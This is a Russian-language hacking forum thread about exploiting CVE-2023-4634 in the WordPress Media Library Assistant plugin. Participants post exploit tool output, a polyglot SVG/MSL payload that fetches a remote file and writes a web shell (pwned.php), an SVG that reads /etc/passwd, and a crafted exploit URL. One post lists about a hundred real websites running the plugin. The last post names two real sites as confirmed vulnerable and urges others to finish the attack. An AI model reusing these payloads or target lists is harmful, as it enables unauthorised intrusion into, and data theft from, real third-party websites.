Wordpress Plugin Media-Library Plugin | RCE | CVE-2023-4634

Discussion in 'Песочница' started by marmalade_knight, 16 Sep 2023.

  1. marmalade_knight

    marmalade_knight New Member

    Joined:
    14 Aug 2021
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Вот этот десткий садик про WSO не обязательно дописывать, достаточно просто информации про эксплоит.
     
  3. x0xx

    x0xx Banned

    Joined:
    13 Sep 2023
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Пришлось поборотся с установкой, код зависим от версии 3.9+ иначе будет улетать в ошибку от grequests.
    По мимо прочего не хватает pillow. В случае с deb:11 (python3.11*) для корректной установки запускал с флагом
    Code:
    python3 -m pip install -r requirements.txt --break-system-packages
    
    Поясните за заливку:
    Code:
    [-] Checking arguments
       [-] All arguments for exploiting target are set, beginning the first checks
       [-] The remote FTP polyglot SVG/MSL file is reachable
       [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
       [-] A sample remote FTP exploiter VID test file is reachable
       [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
       [-] The remote Exploit PNG/PHP file is reachable
    [!] All arguments have been checked correctly, lauching exploitation
    [-] Lauching 100 Threads on long SVG
    [-] Waiting 5 second for the file to be created
    [-] Starting Bruteforcing with VID exploiters
    [-] Checking the drop of pwned.php
       [!] Not yet, try 1 on 9 ... checking again in 10 seconds
       [!] Not yet, try 2 on 9 ... checking again in 10 seconds
       [!] Not yet, try 3 on 9 ... checking again in 10 seconds
       [!] Not yet, try 4 on 9 ... checking again in 10 seconds
       [!] Not yet, try 5 on 9 ... checking again in 10 seconds
       [!] Not yet, try 6 on 9 ... checking again in 10 seconds
       [!] Not yet, try 7 on 9 ... checking again in 10 seconds
       [!] Not yet, try 8 on 9 ... checking again in 10 seconds
       [!] Not yet, try 9 on 9 ... checking again in 10 seconds
       [!] Exploit has not worked, try by increase concurrency value or use another method
    
    
    Прав на корень не хватает? Крутим старые добрые пути к --exploitname one/way/upload/pwned.php ?
    UPD: мимо


    Code:
    grep exploitname CVE-2023-4634.py
            '--exploitname',
        exploitname = args.exploitname
            if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname:
                print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red"))
        </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname }
        elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname:
            print(colored("[-] Checking the drop of "+exploitname, "cyan"))
            target_virus = target+"/"+exploitname
    
    
    upd:
    непонятно, в poly.svg захардкожен путь:

    cat remote_ftp/poly.svg
    Code:
    <?xml version="1.0" encoding="UTF-8"?>
        <image>
        <read filename="http://123.123.123.123:80/virus.png" />
        <resize geometry="400x400" />
        <write filename="/var/www/html/pwned.php" />
        <get width="base-width" height="base-height" />
        <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/>
        </svg>
    
    Ручное поднятие ftp с открытым анонимным пользователем и заливка 2х svg (1.svg + 1.svg[0])
    Code:
    <svg width="500" height="500"
    xmlns:xlink="http://www.w3.org/1999/xlink">
    xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>
    
    При переходе:
    Code:
    http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600
    
    Отдает картинку без контента. Те тупо белый фон, как не меняй *height + width

    Code:
    --webserverpath WEBSERVERPATH
                            Path of the webserver on the victim server (could be found with the LFI and wp-config file) 
    example: /var/www/html
    https://github.com/Patrowl/CVE-2023-4634/issues/2
    

    а может и не быть найден, нужно тестить на локалке. Если кто-то реально использует или соберется тестировать, отпишите.
     
    #3 x0xx, 27 Sep 2023
    Last edited: 27 Sep 2023
  4. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Сегодня вечером на локалке немного тестили, получили странные результаты, завтра будем продолжать. НИПАНЯТНА одним словом, конект к FTP есть а в логах GS ругается. Или нужен специфический SVG или правильные policy для imagemagic еще до конца сам не понял. Дефольтный конфиг Debian 12 не пробился. На парочке рил-таргетов svg отработал, но только рисовалка, прочитать текст через text:/etc/passwd не удалось.
    Если есть желающие присоединиться к нашим веселым посиделкам хекерским, пишите.
     
  5. x0xx

    x0xx Banned

    Joined:
    13 Sep 2023
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Рисование содержимого фаила поверх картинки при помощи mla_debug ака LFI.

    Code:
    ...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen...
    
    Насколько я понимаю уродливая информация поверх картинки в нашем ключе это как раз отрисовка /etc/passwd
    Пример на первый взгляд кажется ошибочным:
    Code:
    <svg width="500" height="500"
    xmlns:xlink="http://www.w3.org/1999/xlink">
    xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>
    
    Но именно ошибка дает возможность вывести данные при помощи mla_debug=true, для меня пока осталось непонятным какие зависомости нужно учесть.
    Очень привередливая бага.
    Фича: wp-content/plugins/media-library-assistant/readme.txt - дает возможность узнать версию плагина.
    на данный момент тестировал вывод лога в :
    Code:
    = 3.06 =
    = 2.79 =
    = 3.04 =
    
     
    #5 x0xx, 29 Sep 2023
    Last edited: 29 Sep 2023
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Ну файлики читать мы разобрались, работает. Есть пару моментов но работает. А вот RCE пока что не видели на таргетах.
    На данный момент даже не ясно почему на некоторых таргетах читалка работает а где-то нет. Подняли локалку, все условия вроде бы как соблюдены, но "читалка" не сработала. Возможно играет роль версии IM или GS.
     
    #6 b3, 30 Sep 2023
    Last edited: 30 Sep 2023
  7. edos

    edos Member

    Joined:
    29 Aug 2005
    Messages:
    114
    Likes Received:
    26
    Reputations:
    9
    сотка ресов с разными версиями, уже многие обновились c последнего моего скана. У самого ничего не получилось с этой CVE

    Code:
    http://theblemish.com/wp-content/plugins/media-library-assistant/readme.txt
    http://funnymedianews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://bonehealthandosteoporosis.org/wp-content/plugins/media-library-assistant/readme.txt
    http://tabacshop.ch/wp-content/plugins/media-library-assistant/readme.txt
    http://nmuofficial.com/wp-content/plugins/media-library-assistant/readme.txt
    http://sirabee.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hometownhealthcenter.org/wp-content/plugins/media-library-assistant/readme.txt
    http://aqleeat.com/wp-content/plugins/media-library-assistant/readme.txt
    http://talkingpointsmemo.com/wp-content/plugins/media-library-assistant/readme.txt
    http://weltwoche.de/wp-content/plugins/media-library-assistant/readme.txt
    http://perishablenews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://cbm.ch/wp-content/plugins/media-library-assistant/readme.txt
    http://desafio21diassemcarne.com.br/wp-content/plugins/media-library-assistant/readme.txt
    http://themagicforless.com/wp-content/plugins/media-library-assistant/readme.txt
    http://catholicnews.com/wp-content/plugins/media-library-assistant/readme.txt
    http://elberadweg.de/wp-content/plugins/media-library-assistant/readme.txt
    http://aryan-solutions.com/wp-content/plugins/media-library-assistant/readme.txt
    http://lightnovelstranslations.com/wp-content/plugins/media-library-assistant/readme.txt
    http://ame-name.com/wp-content/plugins/media-library-assistant/readme.txt
    http://arpc.gov.au/wp-content/plugins/media-library-assistant/readme.txt
    http://brainright.com/wp-content/plugins/media-library-assistant/readme.txt
    http://figment.live/wp-content/plugins/media-library-assistant/readme.txt
    http://fpta.pt/wp-content/plugins/media-library-assistant/readme.txt
    http://tm-consulting.ru/wp-content/plugins/media-library-assistant/readme.txt
    http://maxlucado.com/wp-content/plugins/media-library-assistant/readme.txt
    http://plumamazing.com/wp-content/plugins/media-library-assistant/readme.txt
    http://trolleymuseum.org/wp-content/plugins/media-library-assistant/readme.txt
    http://grapplersguide.com/wp-content/plugins/media-library-assistant/readme.txt
    http://inventorysource.com/wp-content/plugins/media-library-assistant/readme.txt
    http://disneynews.us/wp-content/plugins/media-library-assistant/readme.txt
    http://militaryscalemodelling.com/wp-content/plugins/media-library-assistant/readme.txt
    http://infonomics-society.org/wp-content/plugins/media-library-assistant/readme.txt
    http://croci.net/wp-content/plugins/media-library-assistant/readme.txt
    http://unexmin.eu/wp-content/plugins/media-library-assistant/readme.txt
    http://historicjamestowne.org/wp-content/plugins/media-library-assistant/readme.txt
    http://sis.us/wp-content/plugins/media-library-assistant/readme.txt
    http://shambhala.org/wp-content/plugins/media-library-assistant/readme.txt
    http://localpedia.de/wp-content/plugins/media-library-assistant/readme.txt
    http://phantis.com/wp-content/plugins/media-library-assistant/readme.txt
    http://vintagelittlelady.com/wp-content/plugins/media-library-assistant/readme.txt
    http://uka.org.uk/wp-content/plugins/media-library-assistant/readme.txt
    http://thfoods.com/wp-content/plugins/media-library-assistant/readme.txt
    http://flingtrainer.com/wp-content/plugins/media-library-assistant/readme.txt
    http://trulucks.com/wp-content/plugins/media-library-assistant/readme.txt
    http://cvsu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
    http://globalrallycross.com/wp-content/plugins/media-library-assistant/readme.txt
    http://polkadotwedding.com/wp-content/plugins/media-library-assistant/readme.txt
    http://yosmart.com/wp-content/plugins/media-library-assistant/readme.txt
    http://tretavazrast.com/wp-content/plugins/media-library-assistant/readme.txt
    http://alumni.ucd.ie/wp-content/plugins/media-library-assistant/readme.txt
    http://research.lifeway.com/wp-content/plugins/media-library-assistant/readme.txt
    http://ack.ug.edu.pl/wp-content/plugins/media-library-assistant/readme.txt
    http://library.mwit.ac.th/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.dtwrestling.com/wp-content/plugins/media-library-assistant/readme.txt
    http://zip-tokens.com.customers.tigertech.net/wp-content/plugins/media-library-assistant/readme.txt
    http://elrecanv.vh122.hosterby.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hotel.rosenthal.de/wp-content/plugins/media-library-assistant/readme.txt
    http://alumni.pensacolastate.edu/wp-content/plugins/media-library-assistant/readme.txt
    http://studio.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://studio-rc.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://studio-stage.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
    http://brandstore.wabco-auto.com/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.transition-news.org/wp-content/plugins/media-library-assistant/readme.txt
    http://web.csg.org/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.glciran.com/wp-content/plugins/media-library-assistant/readme.txt
    http://th.kumonglobal.com/wp-content/plugins/media-library-assistant/readme.txt
    http://hrc.sfasu.edu/wp-content/plugins/media-library-assistant/readme.txt
    http://m5.moonideas.com/wp-content/plugins/media-library-assistant/readme.txt
    http://shop.nwfa.org/wp-content/plugins/media-library-assistant/readme.txt
    http://elementor.inmak.net/wp-content/plugins/media-library-assistant/readme.txt
    http://is.fourfaith.com/wp-content/plugins/media-library-assistant/readme.txt
    http://buk.um.ac.id/wp-content/plugins/media-library-assistant/readme.txt
    http://library.addu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
    http://treasure.ready.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://centralny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://bostoncig.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://newhampshire.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://capitalregionny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://vermont.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://missionlifelineia.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://connecticut.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://southernnewengland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://newjersey.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://westernny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://cprblog.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://hudsonvalleyny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://rochester.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://massachusetts.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://longisland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://heartofuticagrants.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://nyc.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://maine.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://midatlantic.heart.org/wp-content/plugins/media-library-assistant/readme.txt
    http://applicants.mta.ac.il/wp-content/plugins/media-library-assistant/readme.txt
    http://33213.dcpserver.de/wp-content/plugins/media-library-assistant/readme.txt
    http://library.joshibi.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://clubcurator.golftec.com/wp-content/plugins/media-library-assistant/readme.txt
    http://byrne.pinelandsalliance.org/wp-content/plugins/media-library-assistant/readme.txt
    http://teacherpress.ocps.net/wp-content/plugins/media-library-assistant/readme.txt
    http://hrlms.ipro.org/wp-content/plugins/media-library-assistant/readme.txt
    http://nyushi.otaru-uc.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://netmedia.kanto-gakuin.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
    http://nasukashi.niye.go.jp/wp-content/plugins/media-library-assistant/readme.txt
     
  8. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    для RCE нужен путь

    тут работает, быстро чекнули, добивай)
    Code:
    midatlantic.heart.org
    clubcurator.golftec.com
     
    edos likes this.